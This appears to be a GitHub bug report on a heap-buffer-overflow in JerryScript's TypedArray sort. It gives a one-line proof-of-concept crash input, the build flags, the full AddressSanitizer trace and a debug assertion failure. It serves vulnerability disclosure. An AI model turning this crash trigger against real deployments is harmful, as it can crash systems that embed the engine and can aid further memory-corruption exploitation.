heap-buffer-overflow in ecma_builtin_typedarray_prototype_sort #5067
Description
JerryScript revision
Commit: 05dbbd1
Version: v3.0.0
Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
Build steps
python ./tools/build.py --clean --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20Test case
// poc.js
a = new Int16Array ( 1073741825 ) . sort ( ) ; Execution steps & Output
$ ./jerryscript/build/bin/jerry poc.js
==3598395==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf5100634 at pc 0x5666342e bp 0xffaaafb8 sp 0xffaaafa8
WRITE of size 4 at 0xf5100634 thread T0
#0 0x5666342d in ecma_builtin_typedarray_prototype_sort /jerryscript/jerry-core/ecma/builtin-objects/typedarray/ecma-builtin-typedarray-prototype.c:1261
#1 0x5666342d in ecma_builtin_typedarray_prototype_dispatch_routine /jerryscript/jerry-core/ecma/builtin-objects/typedarray/ecma-builtin-typedarray-prototype.c:2007
#2 0x5665ea28 in ecma_builtin_dispatch_routine /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1460
#3 0x5665ea28 in ecma_builtin_dispatch_call /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1489
#4 0x56673db7 in ecma_op_function_call_native_built_in /jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1217
#5 0x56675c84 in ecma_op_function_call /jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1411
#6 0x566d6e89 in opfunc_call /jerryscript/jerry-core/vm/vm.c:758
#7 0x566d6e89 in vm_execute /jerryscript/jerry-core/vm/vm.c:5217
#8 0x566d8152 in vm_run /jerryscript/jerry-core/vm/vm.c:5312
#9 0x566d838f in vm_run_global /jerryscript/jerry-core/vm/vm.c:286
#10 0x5663682e in jerry_run /jerryscript/jerry-core/api/jerryscript.c:548
#11 0x5672b354 in jerryx_repl /jerryscript/jerry-ext/util/repl.c:66
#12 0x5662ef56 in main /jerryscript/jerry-main/main-desktop.c:226
#13 0xf7621ed4 in __libc_start_main (/lib32/libc.so.6+0x1aed4)
#14 0x56631fb4 in _start (/jerryscript/build/bin/jerry+0x12fb4)
0xf5100634 is located 0 bytes to the right of 4-byte region [0xf5100630,0xf5100634)
allocated by thread T0 here:
#0 0xf7a0a817 in __interceptor_malloc ../../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
#1 0x56631ae4 in jmem_heap_alloc /jerryscript/jerry-core/jmem/jmem-heap.c:254
#2 0x56696d8d in jmem_heap_gc_and_alloc_block /jerryscript/jerry-core/jmem/jmem-heap.c:291
#3 0x56663281 in ecma_builtin_typedarray_prototype_sort /jerryscript/jerry-core/ecma/builtin-objects/typedarray/ecma-builtin-typedarray-prototype.c:1248
#4 0x56663281 in ecma_builtin_typedarray_prototype_dispatch_routine /jerryscript/jerry-core/ecma/builtin-objects/typedarray/ecma-builtin-typedarray-prototype.c:2007
#5 0x5665ea28 in ecma_builtin_dispatch_routine /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1460
#6 0x5665ea28 in ecma_builtin_dispatch_call /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1489
#7 0x56673db7 in ecma_op_function_call_native_built_in /jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1217
#8 0x56675c84 in ecma_op_function_call /jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1411
#9 0x566d6e89 in opfunc_call /jerryscript/jerry-core/vm/vm.c:758
#10 0x566d6e89 in vm_execute /jerryscript/jerry-core/vm/vm.c:5217
#11 0x566d8152 in vm_run /jerryscript/jerry-core/vm/vm.c:5312
#12 0x566d838f in vm_run_global /jerryscript/jerry-core/vm/vm.c:286
#13 0x5663682e in jerry_run /jerryscript/jerry-core/api/jerryscript.c:548
#14 0x5672b354 in jerryx_repl /jerryscript/jerry-ext/util/repl.c:66
#15 0x5662ef56 in main /jerryscript/jerry-main/main-desktop.c:226
#16 0xf7621ed4 in __libc_start_main (/lib32/libc.so.6+0x1aed4)
SUMMARY: AddressSanitizer: heap-buffer-overflow /jerryscript/jerry-core/ecma/builtin-objects/typedarray/ecma-builtin-typedarray-prototype.c:1261 in ecma_builtin_typedarray_prototype_sort
Shadow bytes around the buggy address:
0x3ea20070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3ea20080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3ea20090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3ea200a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3ea200b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x3ea200c0: fa fa fa fa fa fa[04]fa fa fa 00 fa fa fa 00 00
0x3ea200d0: fa fa 00 02 fa fa 05 fa fa fa 00 00 fa fa 00 fa
0x3ea200e0: fa fa 00 04 fa fa fd fd fa fa 00 06 fa fa 00 03
0x3ea200f0: fa fa 00 07 fa fa 00 00 fa fa fa fa fa fa fa fa
0x3ea20100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3ea20110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==3598395==ABORTING
with debugging mode(--debug)
Outputs
ICE: Assertion 'buffer_index == info_p->length' failed at /jerryscript/jerry-core/ecma/builtin-objects/typedarray/ecma-builtin-typedarray-prototype.c(ecma_builtin_typedarray_prototype_sort):1265.
Error: JERRY_FATAL_FAILED_ASSERTION